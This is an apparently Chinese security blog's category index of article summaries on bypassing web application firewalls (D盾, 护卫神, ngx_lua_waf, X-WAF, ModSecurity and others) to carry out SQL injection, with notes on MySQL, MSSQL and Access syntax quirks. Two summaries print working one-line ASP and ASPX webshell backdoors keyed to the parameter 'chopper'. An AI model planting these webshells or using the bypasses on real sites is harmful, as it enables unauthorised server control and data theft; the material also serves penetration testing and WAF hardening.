随笔分类 - 16-WAF Bypass
WAF绕过、Bypass
摘要:在WAF防护逐渐盛行的前几年,我曾研究过各种WAF绕过的技巧,也曾突破过各种各样的WAF防护。最近,准备重新梳理下自己的知识体系,于是,我将自己写过的关于WAF攻防相关的文章内容合并到一个文档,并形成一个完整目录。 这份文档分为技巧篇和实战篇,技巧篇介绍了各种服务器、数据库、应用层、WAF层的特性,
阅读全文
摘要: 梳理了一下自己写过的WAF Bypass相关的文章,按照编写时间顺序,整理成了一个WAF Bypass实战系列,如果你准备了解WAF攻防这一块的内容,可以来了解一下。 第一篇:《BypassD盾IIS防火墙SQL注入防御(多姿势)》 原文地址:http://www.cnblogs.com/xia
阅读全文
摘要:0x00 前言 护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能。 这边主要分享一下几种思路,Bypass 护卫神SQL注入防御。 0x01 环境搭建 护卫神官网:http://www.huweishe
阅读全文
摘要:0x00 前言 ngx_lua_waf是一款基于ngx_lua的web应用防火墙,使用简单,高性能、轻量级。默认防御规则在wafconf目录中,摘录几条核心的SQL注入防御规则: 这边主要分享三种另类思路,Bypass ngx_lua_waf SQL注入防御。 0x01 环境搭建 github源
阅读全文
摘要:原文首发于安全客,原文链接:https://www.anquanke.com/post/id/103771 0x00 前言 OpenResty® 是一个基于 Nginx 与 Lua 的高性能 Web 平台,其内部集成了大量精良的 Lua 库、第三方模块以及大多数的依赖项。 OpenResty官网
阅读全文
摘要:0x00 前言 在服务器客户端领域,曾经出现过一款360主机卫士,目前已停止更新和维护,官网都打不开了,但服务器中依然经常可以看到它的身影。从半年前的测试虚拟机里面,翻出了360主机卫士Apache版的安装包,就当做是一个纪念版吧。这边主要分享一下几种思路,Bypass 360主机卫士SQL注入防御
阅读全文
摘要:0x00 前言 X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 本文从代码出发,一步步理解WAF的工作原理,多姿势进行WAF Bypass。 0x01 环境搭建 官网:https://waf.xsec.io github源码:https:/
阅读全文
摘要:ModSecurity 是一款开源Web应用防火墙,支持Apache/Nginx/IIS,可作为服务器基础安全设施,还是不错的选择。 系统环境:window 2008 R2+IIS 7 0X01 ModSecurity安装 ModSecurity 下载地址:http://www.modsecurit
阅读全文
摘要:0x01 前言 之前发了一篇博客《Bypass D盾_IIS防火墙SQL注入防御(多姿势)》,D哥第一时间联系我,对问题进行修复。这段时间与D哥聊了挺多关于D盾这款产品的话题,实在是很佩服,对这样一款产品的细致以及投入。一个人,一款产品,一路走来,弥足艰辛。旧版D盾_防火墙支持win2003,新版D
阅读全文
摘要:0x01 前言 在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。 这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。 Bypass思路:只考虑关键字被过滤如何进行Byp
阅读全文
摘要:aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Reque
阅读全文
摘要:ASP一句话木马收集: <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Req
阅读全文
摘要:0X01 前言 D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(
阅读全文
摘要:X-WAF 最近才关注到的一款云WAF,花了一些时间搭建了一个环境,并做了一些测试,感觉比较适合新手来练习WAF Bypass。 X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 官网:https://waf.xsec.io/ 源码:https://
阅读全文
摘要:0x01 前言 一直在思考如何编写一个自动化注入工具,这款工具不用太复杂,但是可以用最简单、最直接的方式来获取数据库信息,根据自定义构造的payload来绕过防护,这样子就可以。 0x02 SQL注入工具 A、联合查询 union select 实现起来最为简单,报错注入的实现方式也基本一致,主要思
阅读全文
摘要:0x01 前言 在测试过程中,经常会遇到一些主机防护软件,对这方面做了一些尝试,可成功bypass了GET和POST的注入防御,分享一下姿势。 0x02 环境搭建 Windows Server 2003+phpStudy sql注入点测试代码: sql.php 运行效果: 0x03 Bypass 过
阅读全文
摘要:ngx_lua_waf ngx_lua_waf是一个基于lua-nginx-module(openresty)的web应用防火墙 源码:https://github.com/loveshell/ngx_lua_waf 安装部署 系统版本:Centos6.5 x86_64 1、openresty的配置
阅读全文
摘要:0x01 背景 无聊,测试了一下access特性 0x02 测试 常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 位置一:参数和union之间的位置 (
阅读全文
摘要:0x01 背景 探索玩了Mysql特性,继续来探索一下MSsql特性。 0x02 测试 常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin 位置一:参数和u
阅读全文
摘要:0x01 背景 Mysql数据库特性探索,探索能够绕过WAF的数据库特性。 0x02 测试 常见有5个位置即: SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【位置四】from【位置五】admin 位置
阅读全文